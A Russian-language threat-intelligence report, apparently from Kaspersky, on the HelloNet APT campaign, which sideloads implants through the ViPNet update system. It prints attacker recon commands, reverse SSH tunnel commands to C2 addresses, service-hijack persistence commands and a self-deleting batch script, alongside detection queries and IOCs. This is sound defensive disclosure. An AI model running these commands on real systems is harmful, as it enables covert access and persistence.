UPD 16.07.2026: Добавили правила для защиты компаний, использующих нашу SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), а также перечислили события для разработки собственных правил детектирования или проведения Threat hunting.
UPD 16.07.2026: Опубликовали рекомендации по выявлению вредоносной активности с помощью Kaspersky Managed Detection and Response.
UPD 16.07.2026: Добавили правила и примеры детектирования с помощью KEDR Expert.
UPD 16.07.2026: Добавлено выявление вредоносной кампании в сетевом трафике с помощью Kaspersky Anti Targeted Attack (KATA) с модулем NDR.
UPD 16.07.2026: Дополнили список индикаторов компрометации, опубликовали большой список TTPs.
Мы обнаружили новую APT-атаку с использованием ранее неизвестного инструментария, которая началась как минимум в мае 2026 года и остается активной на момент публикации. Она примечательна тем, что используемые в ходе нее импланты запускались через систему обновления ViPNet (программный комплекс для создания защищенных сетей). В ходе нашего исследования мы выявили попытки целенаправленного заражения крупных российских организаций из государственного, энергетического, транспортного, образовательного и логистического секторов, а также промышленности. Это уже не первый случай, когда продвинутая группировка нацеливается на компьютеры, подключенные к сетям ViPNet. Например, в прошлом году мы обнаружили сложный бэкдор, мимикрирующий под обновления ViPNet.
Закрепление через систему обновления
В одной из проанализированных систем мы выявили вредоносный файл c именем wtsapi32.dll в директории C:\Program Files (x86)\InfoTeCS\VIPNet Update System, которая относится к системе обновления комплекса ViPNet. Помещая файл в эту директорию, злоумышленники реализуют технику DLL Sideloading — ей подвержен исполняемый файл системы обновлений ViPNet itcsrvup64.exe, который запускается при старте операционной системы. Таким образом, в ходе данной атаки злоумышленники пытались реализовать закрепление на системе через компонент обновления ПО ViPNet.
HelloInjector — загрузчик дополнительных вредоносных компонентов
Компонент wtsapi32.dll является загрузчиком, который мы назвали HelloInjector. Его основная цель — внедрить свой код в процесс svchost.exe и запустить вредоносную нагрузку. После запуска вредонос проверяет процесс, в контексте которого он был запущен. Если имя основного процесса не svchost.exe, загрузчик запускает перебор всех процессов, запущенных в операционной системе. Он ищет процесс, имя которого содержит строку svchost, а командная строка — строку netsvcs. Если такой процесс найден, загрузчик внедряет себя в целевой процесс с помощью функций NtWriteVirtualMemory и NtCreateThreadEx.
После повторного запуска в новом процессе загрузчик снова проверяет имя процесса на наличие строки svchost. Убедившись в успешной проверке, HelloInjector загружает и выполняет в памяти вредоносную нагрузку, которая хранится в его теле в открытом виде.
HelloProxy — инструмент для проксирования трафика и запуска новых вредоносных нагрузок
Вредоносная нагрузка, которую мы назвали HelloProxy, является одновременно скрытым прокси и загрузчиком следующих модулей, которые присылает командный сервер. Она работает за счет перехвата функций NtDeviceIoControlFile, closesocket и shutdown. Их перехват осуществляется с помощью Microsoft библиотеки Detours.
Обработчики функций closesocket и shutdown препятствуют преждевременному закрытию сокетов, которые используются для взаимодействия с С2. В свою очередь, обработчик функции NtDeviceIoControlFile содержит основную вредоносную логику. Его код реализует перехват двух IOCTL кодов:
AFD_RECV(0x12017)AFD_GET_TDI_HANDLES(0x12037)
Эти коды используются во время работы с сокетами — их перехват позволяет вредоносу препятствовать защитным решениям, работающим в режиме пользователя для фильтрации сетевых подключений. Защитные решения «Лаборатории Касперского» детектируют подобную активность и предотвращают попытки заражения на всех этапах.
Обработчик AFD_GET_TDI_HANDLES отвечает за регистрацию сокета, а обработчик AFD_RECV инициирует обработку входящего трафика. Стоит отметить, что каждое поступившее сообщение, которое вызвало обработку AFD_RECV кода, логируется в файл C:\users\public\tesh4RPC.txt в формате threadid: pid=\r\n. После установки перехватчиков, вредонос начинает прослушивать порты 5003 и 5060 в ожидании первых команд от С2 сервера. Для того, чтобы отличить трафик командного сервера от остального трафика, имплант реализует процесс рукопожатия: отправляет два байта 0x0502 через сокет и ожидает получить сообщение, содержащее строку ASDFASFSAFASDF. После успешного завершения рукопожатия, продолжается обработка входящих команд.
В зависимости от поступившей команды, есть две ветви исполнения:
- Работа в качестве прокси. Вредонос принимает строки в виде
:после чего создает новые сокеты и начинает передавать трафик между ними. - Работа в качестве загрузчика. Вредонос принимает исполняемый файл от командного сервера, после чего загружает его в память собственного процесса и запускает в отдельном потоке.
В ходе исследования нам удалось обнаружить две вредоносные нагрузки, которые были внедрены в процесс svchost, вероятно в результате работы ранее описанного загрузчика:
- Имплант, который мы назвали HelloExecutor, с помощью которого атакующие могут выполнять команды на зараженной системе;
- Модуль для очистки файлов журналов ПО ViPNet, который мы назвали HelloCleaner. Он позволяет скрыть действия злоумышленников в системе.
Мы установили, что бэкдор HelloExecutor использовался для проведения разведки в сетях зараженных организаций. Исполнялись следующие шелл-команды:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
query user ipconfig /all ping 8.8.8.8 -n 1 net user /do net group /do dir "C:\Program Files (x86)" dir "C:\Program Files (x86)\infotecs\" dir "C:\Program Files (x86)\infotecs\ViPNet Administrator" dir "C:\Program Files (x86)\infotecs\ViPNet Client\Export" dir "C:\Program Files (x86)\infotecs\ViPNet Client" dir "С:\ProgramData\Infotecs\ViPNet Administrator\kc\Export\" dir "$appdata\Infotecs\ViPNet Administrator\kc\Export\ Dst for network " dir c:\users\[username] query user dir C:\Users\Public\music |
В этих командах примечательно упоминание директории C:\Users\Public\Music. Мы установили, что на зараженных машинах злоумышленники использовали эту директорию при запуске SSH-туннеля из зараженной инфраструктуры к командному серверу атакующих (5.39.253[.]206). Злоумышленники запускали переименованный исполняемый файл легитимной утилиты PuTTy (клиента для различных протоколов удаленного доступа):
|
1 |
C:\users\public\music\frontpage.exe -C -N -R 8443:[redacted]:5003 sftp@5.39.253[.]206 -P 3522 -pw [redacted] |
HelloBackdoor — бэкдор на языке Rust для манипуляций файловой системой
Помимо этого, на одной из зараженных систем был обнаружен бэкдор написанный на языке Rust, который мы назвали HelloBackdoor. Он принимает подключения на 443 порту, ожидая строки 47c6235b4d2611184 (вторая половина MD5-хэша строки hello\n) для активации бэкдора. Этот бэкдор далее принимает следующие команды:
!upload — загрузить файл на зараженную машину
!down — выгрузить файл с зараженной машины
!stop — остановить работу бэкдора. Для этого создается и исполняется BAT-файл со следующим содержимым:
|
1 2 3 4 5 6 7 8 9 10 |
@echo off :loop if exist ( del /F /Q if exist goto loop ) sc stop iplircontrol >nul timeout 5 > nul sc start iplircontrol > nul (goto) 2>nul & del /F /Q %0 |
Если текст команды не совпал с выше перечисленными, команда выполняется с помощью cmd.exe.
Атрибуция
В ходе анализа одного из образцов DLL-файла wtsapi32.dll мы нашли неиспользуемую строку
|
1 |
GET / HTTP/1.1\r\nHost: news.sina.com\r\nConnection : keep - alive\r\nUpgrade - Insecure - Requests : 1\r\nUser - Agent : Mozilla / 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 145.0.0.0 Safari / 537.36 Edg / 145.0.0.0\r\nAccept : text / html, application / xhtml + xml, application / xml; q = 0.9, image / avif, image / webp, image / apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\n . |
Она отсылает к новостному порталу sina.com, популярному в Китае.
Кроме того, анализируя строки в бэкдоре HelloBackdoor, мы установили, что при компиляции осуществлялась загрузка пакетов (крейтов) Rust с зеркала mirrors.ustc.edu.cn. Скорее всего, данные строки остались во вредоносных файлах непреднамеренно. Однако нельзя исключать и вероятность использования «ложных флагов», внедренных злоумышленниками для усложнения процесса атрибуции. В настоящее время мы с низкой долей уверенности связываем данную кампанию с деятельностью неизвестной китайскоязычной APT-группировки.
Рекомендации
Учитывая, что ПО ViPNet не первый раз используется продвинутыми злоумышленниками для проведения кибератак, мы рекомендуем уделить особое внимание защите рабочих станций с данным ПО. В частности, следует настроить мониторинг сетевого трафика на указанных в статье портах для своевременного обнаружения признаков компрометации.
Противодействие сложным целевым атакам требует комплексного подхода, объединяющего технологии защиты, работающие на различных этапах жизненного цикла кибератаки. Такая многоуровневая модель безопасности помогает не только обнаруживать, но и предотвращать инциденты подобного класса. Данный подход заложен в архитектуру решений линейки Kaspersky Symphony, предназначенных для защиты бизнеса от угроз уровня APT, включая атаки, подобные описанной в этой статье.
Решения «Лаборатории Касперского» обнаруживают эту угрозу с помощью следующих вердиктов:
- Trojan.Win32.Agentb.ttoe,
- Trojan.Win64.Convagent.gen,
- Trojan.Win64.Agent.smgpqx
- HEUR:Trojan.Win64.DllHijacking.gen
Детектирование решениями «Лаборатории Касперского»
Защитные решения «Лаборатории Касперского», такие как Kaspersky Endpoint Detection and Response Expert, успешно обнаруживают вредоносную активность в рамках описанных атак.
Один из практических способов детектирования — мониторинг переименованных бинарников PuTTY/Plink, а не по имени файла: даже если исполняемый файл называется frontpage.exe, его PE-заголовок, версия, строки и хэш совпадают с оригинальным Plink, что подтверждается событиями EDR. Кроме того, стоит обратить внимание на конкретную командную строку, с которой запущен процесс. Решение KEDR Expert детектирует эту активность с помощью правила using_plink_or_putty_for_port_forwarding.
Также важно отслеживать Process Injection в svchost.exe от процесса обновления ViPNet itcsrvup64.exe, поскольку легитимно этот компонент не должен внедрять код в системные процессы. Подобное поведение является характерным индикатором активности HelloInjector, использующего доверенный и подписанный процесс как маскировку вредоносной инъекции. Решение KEDR Expert детектирует эту активность с помощью правила vipnet_load_library_code_injection.
Еще один эффективный способ обнаружения вредоносной активности связанной с VinNet, — это мониторинг сетевого трафика. Решение Kaspersky Anti Targeted Attack (KATA) с модулем NDR обнаруживает данную активность с помощью IDS модуля и Suricata правила на активность бэкдора — HelloBackdoor.
Правило реализовано, опираясь на первый ожидаемый вредоносом пакет. Он принимает подключения по протоколу TCP на 443 порту, ожидая получения команды 47c6235b4d2611184 (часть MD5-хэша строки hello\n), которая активирует бэкдор.
Сервис Kaspersky Managed Detection and Response детектирует данную атаку с помощью мониторинга следующих действий:
- Отслеживание создания библиотеки
wtsapi32.dllв директорииC:\Program Files (x86)\InfoTeCS\VIPNet Update System. - Отслеживание запуска необычных процессов (не типовых для VipNet, отсутствует подпись InfoTeCS) от процесса обновлений VipNet (
Itcsrvup64.exeилиItcsrvup.exe). - Создание файлов библиотек (.dll) в директории связаной с VipNet (по умолчанию это
ViPNet Update SystemилиVIPNET CLIENT) от процессов VipNet. - Нетиповая активность (создание файлов\запуск процессов) от экземпляра процесса
svchost.exe. - Создание исполняемых файлов в директориях доступных для записи по умолчанию (
%ProgramData%,%TEMP%,%SystemRoot%\Temp, C:\Users\Public\, music|pictures|videos|contacts|links|libraries). - Отслеживание создания туннелей с помощью процессов ssh или plink (идентификация выполняется по оригинальному имени PE-файла, а не по имени исполняемого файла), детект строится на наличии в командной строке подстрок вида port:address:port и их вариаций.
Для защиты компаний, использующих нашу SIEM-систему Kaspersky Unified Monitoring and Analysis Platform (KUMA), в репозитории продукта доступны правила, которые помогают обнаружить подобную вредоносную активность.
Выполнение разведки пользователей и групп, сетевых подключений стандартными утилитами Windows детектируется следующими правилами:
- R220_02_Сбор информации об учетных записях стандартными средствами Windows
- R221_01_Сбор информации о группах с помощью инструментов Windows
- R224_02_Сбор информации об удаленной системе стандартными средствами Windows
- R224_14_Разведывательная активность на Windows
- R226_02_Сбор информации о сетевых подключениях стандартными средствами Windows
Также для разработки собственных правил детектирования или проведения Threat hunting рекомендуем обратить внимание на следующие события:
- Создание подозрительных файлов в директории обновлений ViPNet
C:\Program Files (x86)\InfoTeCS\VIPNet Update System:
123(DeviceEventClassID = '4663' OR DeviceEventClassID = '11')AND match(FileName, '.*\\.(exe|dll)')AND FileName ilike '%\InfoTeCS\VIPNet Update System\%' - Закрепление при помощи техники DLL Sideloading с загрузкой библиотеки
wtsapi32.dllв процессы обновлений ViPNetItcsrvup64.exeилиItcsrvup.exeс невалидной подписью (Signed not true, SignatureStatus not valid) или подпись не содержит информацию о производителе InfoTeCS:
12345DeviceEventClassID = 7AND match(DestinationProcessName, '.*\\\\(itcsrvup64|itcsrvup)\\.exe')AND FileName ilike '%wtsapi32.dll'AND FileName ilike '%\InfoTeCS\VIPNet Update System\%'AND ((DeviceCustomNumber1 = 0 AND DeviceCustomNumber2 = 0) OR NOT FlexString2 ilike '%InfoTeCS%') - Запуск нестандратных процессов от процессов обновлений ViPNet
Itcsrvup64.exeилиItcsrvup.exe:
123(DeviceEventClassID = '4688' OR DeviceEventClassID = '1')AND match(SourceProcessName, '.*\\\\(Itcsrvup64|Itcsrvup)\\.exe')AND NOT match(DestinationProcessName, '.*\\\\(wmail|monitor|itcsrvup64)\\.exe') - Запуск процессов обновлений ViPNet
Itcsrvup64.exeилиItcsrvup.exeс невалидной подписью (Signed not true, SignatureStatus not valid) или подпись не содержит информацию о производителе InfoTeCS: - Нетипичное выполнение разведки от процесса svchost.exe:
123(DeviceEventClassID = '4688' OR DeviceEventClassID = '1')AND SourceProcessName ilike '%svchost\.exe'AND match(DeviceCustomString4, '.*cmd(.exe)?.*\/c\s+(net\s+(use|group)|sc\s+(query|start|stop)|ping|ipconfig|netstat).*') - Создание туннелей с помощью переименованных процессов ssh или plink:
123DeviceEventClassID = '1'AND match(OldFileName, '.*(plink|ssh).*')AND DeviceCustomString4 match '\d+:\d+\.\d+\.\d+\.\d+:\d+'
Для корректной работы правил обнаружения и Threat hunting необходимо убедиться, что события с Windows-систем поступают в KUMA в полном объеме, включая события со следующими идентификаторами: Sysmon 1, 7, 11, а также Security 4688, 4663.
Индикаторы компрометации
HelloBackdoor
16C211C96735F2FAE9361B89BD7A31BF
1BFE2B9493128574907A8279256A8BCC
f9eed2f0158dc98e7012fb809152209c
Дропперы от HelloBackdoor
6001829A128FE264B4403138700C11A8 — infotecs\vipnet client\puh.exe
EE4FF46DDD8489E81447962F927BC3F6 — infotecs\vipnet client\store.exe
Утилита для внесения исключений в Windows Defender
41c938b3cd7e55d4077e34976929b140
wtsapi32.dll
B103CD21280B4061F88B2BCC51394894
9F5606A0755BC633B9BD7DB6D179C09E
0CFDFFC56F0FA325D0C4D24780B46597
С2
5.39.253[.]206
176.32.34[.]135
Обнаруженные TTP:
T1569.002 — System Services: Service Execution
"cmd" /c sc start UrBackupClientBackend
T1016 — System Network Configuration Discovery
"cmd" /c arp -a"cmd" /c routeprint
T1049 — System Network Connections Discovery
"cmd" /c netstat -ano
T1018 — Remote System Discovery
"cmd" /c ping mail.ru -n 2
T1082 — System Information Discovery
"cmd" /c systeminfo
T1057 — Process Discovery
"cmd" /c tasklist
T1007 — System Service Discovery
"cmd" /c sc query UrBackupClientBackend
T1083 — File and Directory Discovery
"cmd" /c dir temp*.tmp"cmd" /c dir $temp\*.tmp"cmd" /c dir amgmt*"cmd" /c dir $user\desktop\mRemoteNG-Portable-1.76.20.24669"cmd" /c dir $public\libraries\"cmd" /c dir d:\WindowsImageBackup
T1005 — Data from Local System
"cmd" /c type $temp\TS_E9E3.tmp"cmd" /c type $temp\Acr6F3D.tmp
T1074.001 — Local Data Staging
"cmd" /c copy appdata\infotecs\*\APN000B.txt $public\libraries\
T1070.004 — Indicator Removal: File Deletion
"cmd" /c del $windir\amgmt.dll"cmd" /c del $public\libraries\APN000B.txt
T1543.003 — Create or Modify System Process: Windows Service
sc stop AppMgmtsc delete AppMgmtsc create AppMgmt binpath= "system32\svchost.exe -k netsvcs" type= share start= auto displayname= "Application Management"sc description AppMgmt "Processes installation, removal, and enumeration requests for software deployed through Group Policy. If the service is disabled, users will be unable to install, remove, or enumerate software deployed through Group Policy. If this service is disabled, any services that explicitly depend on it will fail to start."sc failure AppMgmt reset= 0 actions= restart/0
T1112 — Modify Registry
reg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceDll /t REG_EXPAND_SZ /d $system32\$selfname.dllreg add HKLM\SYSTEM\CurrentControlSet\Services\AppMgmt\Parameters /v ServiceMain /t REG_SZ /d ServiceMain
T1036 — Masquerading (служба, описание и DLL маскируются под легитимную «Application Management»)
"cmd" /c copy $windir\amgmt* $system32\
T1059.003 — исполнение вспомогательных скриптов
"cmd" /c $windir\amgmt.bat"cmd" /c $windir\insru.cmd
T1105 — Ingress Tool Transfer
"cmd" /c $programfiles\7-zip\7z.exe x $windir\Irsoisas.zip -o"$windir
T1562.001 — Impair Defenses: Disable or Modify Tools
"cmd" /c \$windir\puh.exe add $windir\autoit3.exe white
T1059 / T1218 — Proxy-исполнение через AutoIt
"cmd" /c \$windir\autoit3.exe \$windir\data.dat
T1572 — Protocol Tunneling / T1090 — Proxy / T1021.004 — Remote Services: SSH
c:\users\[username]\libraries\pagent.exe -C -N -R 6443:[redacted] root@176.32.34.135 -P 48022 -pw [redacted]





Кампания HelloNet — новые вредоносные модули, которые запускаются через систему обновления ViPNet